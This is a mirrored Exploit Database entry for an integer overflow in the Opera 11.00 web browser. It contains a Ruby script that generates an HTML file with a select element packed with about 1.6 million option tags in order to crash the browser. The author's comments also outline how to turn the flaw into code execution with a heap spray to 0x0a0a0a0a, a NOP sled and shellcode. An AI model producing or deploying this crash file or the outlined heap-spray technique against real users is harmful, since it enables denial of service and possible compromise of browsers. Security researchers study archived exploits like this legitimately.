Opera Web Browser 11.00 – Integer Overflow

• Exploit Database
• 12 阅读

• 作者： C4SS!0 G0M3S
  日期： 2011-01-25
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/16042/

• #
  #
  #[+]Exploit Title: Exploit Integer Overflow Opera Web Browser 11.00
  #[+]Date: 24\01\2011
  #[+]Author: C4SS!0 G0M3S
  #[+]Software Link: http://get12.opera.com/pub/opera/win/1100/int/Opera_1100_int_Setup.exe
  #[+]Version: 11.00
  #[+]Tested On: WIN-XP SP3 PORTUGUESE BRAZILIAN
  #[+]CVE: N/A
  #
  #
  #
  #Note:
  #This exploit is only a Denial of Service in opera web browser
  #I created a poc using heap spray that allow code execution
  #but I will not post here because it can be used for evil
  #And I do not want that.
  # for you to explore the program you control with the number esi childrens then created using a spray heap address any such
  #0a0a0a0a the data in address should be the point to the beginning of the shellcode
  #0a0a0a0a => \x90\x90\x90 => and your shellcode
  #Then the function mov eax, [esi] places the value in eax then the program call eaxand boom run shellcode !!!!!
  #
  #
  #
  
  
  
  
  print "[*]Creating the Exploit\n"
  i = 0
  buf = "<option>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</option>\n" 
  
  while i<0x4141 
   buf += "<option>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</option>\n" 
  	 i+=1
  end
  
  HTML =
  "<html>\n"+
  "<body>\n\n"+
  "<select>\n\n"
  
  HTML+=buf * 100
  HTML += "\n\n\n\</select>\n\n"+
  "</body>\n\n\n"+
  "</html>\n\n\n\n\n"
  
  f = File.open("Exploit_opera_11.00.html","w")
  f.puts HTML
  f.close
  puts "\n\n\[*]File Created With Sucess"
  sleep(1)
  puts "[*]Go to my Site www.invasao.com.br!"
  sleep(1)